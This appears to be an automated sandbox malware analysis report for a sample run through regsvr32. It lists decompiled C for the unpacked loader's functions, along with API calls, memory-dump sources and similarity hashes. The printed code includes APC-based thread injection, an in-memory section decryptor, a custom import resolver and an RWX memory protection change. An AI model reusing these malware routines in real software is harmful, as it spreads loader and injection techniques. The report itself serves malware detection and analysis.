InterlockedDecrement.KERNEL32(04D74188), ref: 04D71E8E
SleepEx.KERNEL32(00000064,00000001), ref: 04D71EA8
CloseHandle.KERNEL32 ref: 04D71EC4
HeapDestroy.KERNEL32 ref: 04D71ED0

Memory Dump Source

Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 745b82e17387b60488825889b8656562e92d3f988a859eccb3e3fd918dbcbe6c
Instruction ID: 81d868449ccb85b516fe09ddc07dbb5871be605a0137db4fcf942229dacd5805
Opcode Fuzzy Hash: 745b82e17387b60488825889b8656562e92d3f988a859eccb3e3fd918dbcbe6c
Instruction Fuzzy Hash: 2B219D71B00225EFDB21AFA9EC94A5E7BE8FB557A07100229E945D3340FB38AD04DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04D71CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E04D71CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x4d741cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x04d71cbb
0x04d71cc1
0x04d71cc5
0x04d71cd0
0x04d71cd8
0x04d71ce1
0x04d71ce5
0x04d71cec
0x04d71cf3
0x04d71cf5
0x04d71cfb
0x04d71cd8
0x04d71cff

APIs

CreateThread.KERNEL32 ref: 04D71CBB
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 04D71CD0
GetLastError.KERNEL32(00000000), ref: 04D71CDB
TerminateThread.KERNEL32(00000000,00000000), ref: 04D71CE5
CloseHandle.KERNEL32(00000000), ref: 04D71CEC
SetLastError.KERNEL32(00000000), ref: 04D71CF5

Memory Dump Source

Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 6ed331262e7c297a0b3d237fa9a98c945fddf4178ffbbd12180c49eccfb60213
Instruction ID: 5bb1c695cb7443df921364bc14fecf7ffb4e6c4834740a0f526a706acb7c52f1
Opcode Fuzzy Hash: 6ed331262e7c297a0b3d237fa9a98c945fddf4178ffbbd12180c49eccfb60213
Instruction Fuzzy Hash: 6BF0F836305621BBD7226FA0AC1CF5FBE69FB08751F004904FE0991350E7298C11EBA6

Uniqueness

Uniqueness Score: -1.00%

Function 04D80100, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(000000FF,04EE9DDC,0000304B,00000040,?), ref: 04D801DD

Strings

K0, xrefs: 04D80293
K0, xrefs: 04D80114
K0, xrefs: 04D8023C, 04D802A7, 04D803A3, 04D803B7, 04D803D9, 04D803E8, 04D801F0, 04D8020F, 04D80217
K0, xrefs: 04D803C1, 04D802D4, 04D802FB, 04D80316

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: ProtectVirtual
String ID: K0$ K0$ K0$K0
API String ID: 544645111-2055335449
Opcode ID: b8caec1b1dfdbc12bb5426d8ff108af1f67e06dcdfeca654d61d4cc0ca02daff
Instruction ID: db215b57c73ab7a2a692b373bce112c956f1ae33fe6f82d033869c949514bc0f
Opcode Fuzzy Hash: b8caec1b1dfdbc12bb5426d8ff108af1f67e06dcdfeca654d61d4cc0ca02daff
Instruction Fuzzy Hash: 4F913971B00128CFD708EF6EE4A0A697BFAFB88304B05C6A9D4599B385D77C6D44CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04D715A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E04D715A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x4d741b0;
				_t39 = E04D71A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x4d741cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x4d75137; // 0x4d75137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E04D71D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x4d741cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x04d715aa
0x04d715ba
0x04d715c1
0x04d715c4
0x04d715d9
0x04d715e0
0x04d715e5
0x04d715f6
0x04d715f9
0x04d71601
0x04d71604
0x04d716ae
0x04d7160a
0x04d7160a
0x04d7160e
0x04d71676
0x04d71610
0x04d71610
0x04d71613
0x04d71615
0x04d7161d
0x04d71620
0x04d71623
0x04d7162b
0x04d71633
0x04d71634
0x04d71635
0x04d7163c
0x04d7163c
0x04d71650
0x04d71655
0x04d7165e
0x04d71665
0x04d71668
0x04d7166c
0x04d71671
0x00000000
0x00000000
0x04d71628
0x04d71628
0x04d71673
0x04d71680
0x04d71695
0x04d71682
0x04d7168b
0x04d71690
0x04d716a6
0x04d716a6
0x04d716b5
0x04d716bb

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 04D715F9
memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,04D717EC), ref: 04D7168B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 04D716A6

Strings

Mar 26 2021, xrefs: 04D7162B

Memory Dump Source

Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 26 2021
API String ID: 4010158826-2175073649
Opcode ID: bb4c830e8d75d39d7628478a0f86ae6a151f939c0aaaebf31fb4cb8030995564
Instruction ID: 6207703ffe5429471862425b65ef4ac9ec63cdedf1a87058513df9f610917317
Opcode Fuzzy Hash: bb4c830e8d75d39d7628478a0f86ae6a151f939c0aaaebf31fb4cb8030995564
Instruction Fuzzy Hash: 1F313071E00219ABDB01DF99D881AEEB7B5FF48704F148269E905AB344F775AE05CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04D71D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E04D71D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E04D717A7(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x04d71d3b
0x04d71d40
0x04d71d4e
0x04d71d53
0x04d71d53
0x04d71d59
0x04d71d5e
0x04d71d62
0x04d71d66
0x04d71d66
0x04d71d70
0x04d71d79

APIs

GetCurrentThread.KERNEL32 ref: 04D71D35
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 04D71D40
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 04D71D53
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 04D71D66

Memory Dump Source

Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 1c61c3b5da8f38b166ba2eede616d77b85cc76cf1c1619efe4f10d951728688d
Instruction ID: d97a83ac2bd61ea46a23fe9706e038a800e60e7fc378a6c7af83a35a921bd024
Opcode Fuzzy Hash: 1c61c3b5da8f38b166ba2eede616d77b85cc76cf1c1619efe4f10d951728688d
Instruction Fuzzy Hash: FCE092313053206BE3122E2D5C89E6F7B9CEF923357110325F924D23D0FB589C09D9A5

Uniqueness

Uniqueness Score: -1.00%

Function 04D89447, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,04D83AF1,00000001), ref: 04D89458
HeapDestroy.KERNEL32 ref: 04D8948E

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 5760d410185d5c873c0790f6af209f10cbd8fa8c7d5af86d54b46dc950e2030a
Instruction ID: beb549ca7e95a92dd35cc8f4edeeb023cb29215777787c697c5041e5d2eabe7e
Opcode Fuzzy Hash: 5760d410185d5c873c0790f6af209f10cbd8fa8c7d5af86d54b46dc950e2030a
Instruction Fuzzy Hash: EDE06DB1B10301EAEB517F36BD14B393A98F744647F10447DF494C9094E7B89840AA14

Uniqueness

Uniqueness Score: -1.00%

Function 04D71C12, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E04D71C12(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E04D71112( &_v8,  &_v12,  *0x4d741cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E04D71BCB(_t22, _v8,  *0x4d741cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E04D71566(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x4d74190, 0, _v8);
				}
				return _t25;
			}

0x04d71c12
0x04d71c15
0x04d71c16
0x04d71c2c
0x04d71c35
0x04d71c3a
0x04d71c53
0x04d71c3c
0x04d71c4f
0x04d71c4f
0x04d71c57
0x04d71c59
0x04d71c61
0x04d71c69
0x04d71c71
0x04d71c73
0x04d71c73
0x04d71c71
0x04d71c83
0x04d71c83
0x04d71c8e

APIs

StrStrIA.KERNELBASE(00000000,04D71810,?,04D71810,?,00000000,00000000,?,?,?,04D71810), ref: 04D71C69
HeapFree.KERNEL32(00000000,?,?,04D71810,?,00000000,00000000,?,?,?,04D71810), ref: 04D71C83

Memory Dump Source

Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 83f0f5b3c5813b3e5a1305baae87cf0e99ecec30402c9b5530aacf7d007b974f
Instruction ID: b31563640bea50c606a29b59938b99d2321701df8ab7ddfd7bcfa776b39ca68b
Opcode Fuzzy Hash: 83f0f5b3c5813b3e5a1305baae87cf0e99ecec30402c9b5530aacf7d007b974f
Instruction Fuzzy Hash: 50014F76A00124ABDB119EE5DD41E9FBBFDEB84680F140362EA01E7344F635EE0097B0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04D8CCD5, Relevance: 66.4, APIs: 44, Instructions: 431COMMONLIBRARYCODE

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 04D8CD0A
___getlocaleinfo.LIBCMT ref: 04D8CD1F
___getlocaleinfo.LIBCMT ref: 04D8CD34
___getlocaleinfo.LIBCMT ref: 04D8CD49
___getlocaleinfo.LIBCMT ref: 04D8CD61
___getlocaleinfo.LIBCMT ref: 04D8CD76
___getlocaleinfo.LIBCMT ref: 04D8CD88
___getlocaleinfo.LIBCMT ref: 04D8CD9D
___getlocaleinfo.LIBCMT ref: 04D8CDB5
___getlocaleinfo.LIBCMT ref: 04D8CDCA

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: f85050cfc3fa4117e2ddb9e1b8cd0f5b27e7051b377b55f43499e3c466b91e9e
Instruction ID: c823a62b2efeace73b44df1fcc76d38728ceb7229a1f3e807493fe1a7a625a5a
Opcode Fuzzy Hash: f85050cfc3fa4117e2ddb9e1b8cd0f5b27e7051b377b55f43499e3c466b91e9e
Instruction Fuzzy Hash: 9CE19CB390020DBEFF12DBB18C84EFF77BDEB14748F04096AA259D2050EA75EA159760

Uniqueness

Uniqueness Score: -1.00%

Function 04D8D879, Relevance: 18.3, APIs: 12, Instructions: 290COMMON

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 04D8D8C6

Part of subcall function 04D966E4: ___crtGetLocaleInfoA.LIBCMT ref: 04D9672A
Part of subcall function 04D966E4: GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 04D96738
Part of subcall function 04D966E4: ___crtGetLocaleInfoA.LIBCMT ref: 04D9674F
Part of subcall function 04D966E4: __calloc_crt.LIBCMT ref: 04D96763
Part of subcall function 04D966E4: ___crtGetLocaleInfoA.LIBCMT ref: 04D96781
Part of subcall function 04D966E4: __calloc_crt.LIBCMT ref: 04D96792

__malloc_crt.LIBCMT ref: 04D8D8D8
__calloc_crt.LIBCMT ref: 04D8D8E8
__calloc_crt.LIBCMT ref: 04D8D8F3
__calloc_crt.LIBCMT ref: 04D8D8FE
__calloc_crt.LIBCMT ref: 04D8D90D
GetCPInfo.KERNEL32(?,?), ref: 04D8D960
___crtGetStringTypeA.LIBCMT ref: 04D8D9CD
___crtLCMapStringA.LIBCMT ref: 04D8DA00
___crtLCMapStringA.LIBCMT ref: 04D8DA2D

Part of subcall function 04D9CB4E: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 04D9CB5A
Part of subcall function 04D9CB4E: __crtLCMapStringA_stat.LIBCMT ref: 04D9CB7A

InterlockedDecrement.KERNEL32(?), ref: 04D8DAFF
InterlockedDecrement.KERNEL32(04DE4190), ref: 04D8DBC7

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: ___crt__calloc_crt$Locale$InfoString$DecrementInterlocked$A_statErrorLastTypeUpdateUpdate::____getlocaleinfo__crt__malloc_crt
String ID:
API String ID: 2672922395-0
Opcode ID: 246fd6946708696804ae2df83d69809506d17178a5a245e8ed6f57a678717724
Instruction ID: 25202be19870e5bfb998fb8d9dcf413a7d3cb33f3356a0638fb37f064aeb22a9
Opcode Fuzzy Hash: 246fd6946708696804ae2df83d69809506d17178a5a245e8ed6f57a678717724
Instruction Fuzzy Hash: 01B159B1E04245AEEB10EFA4C894BFEBBF5FF49304F14446DE485A7290E675B845CB20

Uniqueness

Uniqueness Score: -1.00%

Function 04D839FC, Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 04D8B4E5
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04D8B4FA
UnhandledExceptionFilter.KERNEL32(04DDE580), ref: 04D8B505
GetCurrentProcess.KERNEL32(C0000409), ref: 04D8B521
TerminateProcess.KERNEL32(00000000), ref: 04D8B528

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1459bf2641c471dcf6af2b94b7fffe5c9e107708090513e0d9b20c528715ef8f
Instruction ID: 7609c55958ab60e6229e0c710fd6cf44e845674a473934ddb9ce18f52bcf605e
Opcode Fuzzy Hash: 1459bf2641c471dcf6af2b94b7fffe5c9e107708090513e0d9b20c528715ef8f
Instruction Fuzzy Hash: 1C21CEB8901204DFDB10EF67E088A543BA5FB08306F51902EF5088F749E7BD6D888F55

Uniqueness

Uniqueness Score: -1.00%

Function 04D7146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D7146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x4d741b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x4d741bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x4d741ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x4d741a8 = _t5;
					 *0x4d741b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x4d741a4 = _t6;
					if(_t6 == 0) {
						 *0x4d741a4 =  *0x4d741a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x04d7146d
0x04d7147b
0x04d71483
0x04d71488
0x04d714d2
0x04d714d2
0x04d7148a
0x04d71492
0x04d714ce
0x04d714d0
0x04d71494
0x04d71494
0x04d71499
0x04d714a7
0x04d714ac
0x04d714b2
0x04d714ba
0x04d714bf
0x04d714c1
0x04d714c1
0x04d714cb
0x04d714cb

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,04D717B8,74B063F0,00000000), ref: 04D7147B
GetVersion.KERNEL32 ref: 04D7148A
GetCurrentProcessId.KERNEL32 ref: 04D71499
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04D714B2

Memory Dump Source

Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 8f9d0717140b598255b8832dbe4fe7c56bce6fea493ab56fa3e20aae8bbb4fa6
Instruction ID: ebb886c650d063483376f5a21f475caded03006452db8156db449560ef44166d
Opcode Fuzzy Hash: 8f9d0717140b598255b8832dbe4fe7c56bce6fea493ab56fa3e20aae8bbb4fa6
Instruction Fuzzy Hash: 05F06730785230AFE722AF68B829B893BE0F704B91F10012AFA05C93C0F7B85840DB04

Uniqueness

Uniqueness Score: -1.00%

Function 04D71F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D71F31(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x4d741cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x04d71f31
0x04d71f3a
0x04d71f3f
0x04d71f45
0x04d71f4e
0x04d71f54
0x04d71f56
0x04d71f59
0x04d71f5e
0x04d71f65
0x04d71f65
0x04d71f69
0x04d71f71
0x04d71f74
0x00000000
0x00000000
0x04d71f7a
0x04d71f84
0x04d71f86
0x04d71f89
0x04d71f8c
0x04d71f90
0x04d71f98
0x04d71f9a
0x04d71f9d
0x04d72005
0x04d72005
0x04d72009
0x00000000
0x00000000
0x04d71fa2
0x04d71fa8
0x04d71faa
0x04d71fbd
0x04d71fc0
0x04d71fc0
0x04d71fc0
0x04d71fc4
0x04d71fac
0x04d71fac
0x04d71fb4
0x04d71fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x04d71fb6
0x04d71fa4
0x04d71fa4
0x04d71fb8
0x04d71fb8
0x04d71fb8
0x04d71fc7
0x04d71fca
0x04d71fcc
0x04d71fd3
0x04d71fce
0x04d71fce
0x04d71fce
0x04d71fdb
0x04d71fe1
0x04d71fe3
0x04d72013
0x04d71fe5
0x04d71fe5
0x04d71fe8
0x04d71fea
0x04d71ff2
0x04d71ff2
0x04d71ff7
0x04d71ff9
0x04d72000
0x04d72002
0x04d72002
0x04d72002
0x00000000
0x04d72002
0x00000000
0x04d71fe3
0x04d71f92
0x04d71f94
0x04d71f96
0x00000000
0x00000000
0x04d71f96
0x04d72016
0x04d72016
0x04d7201d
0x04d72022
0x00000000
0x00000000
0x04d72028
0x04d72033
0x00000000
0x04d72033
0x04d7202a
0x04d7202a
0x04d72030
0x00000000
0x04d72030
0x04d71f5e
0x04d72034
0x04d72039

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 04D71F69
GetProcAddress.KERNEL32(?,00000000), ref: 04D71FDB

Memory Dump Source

Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 23cbb7fcd5cf3a4aa84ae766ef38eefd595b232c7a22d7a3788518a57bbba8ab
Instruction ID: f980f8f2ff4b686f5b6d9597a15418ac2fdb398c2343c676efcc888b9bb83a58
Opcode Fuzzy Hash: 23cbb7fcd5cf3a4aa84ae766ef38eefd595b232c7a22d7a3788518a57bbba8ab
Instruction Fuzzy Hash: 2A31E572B0020A9FDB24CF69C881AAEB7F4FF44355B1445AAE951E7340F774EA40DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04D8CC83, Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

__decode_pointer.LIBCMT ref: 04D8CC91
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04D8CC98

Memory Dump Source

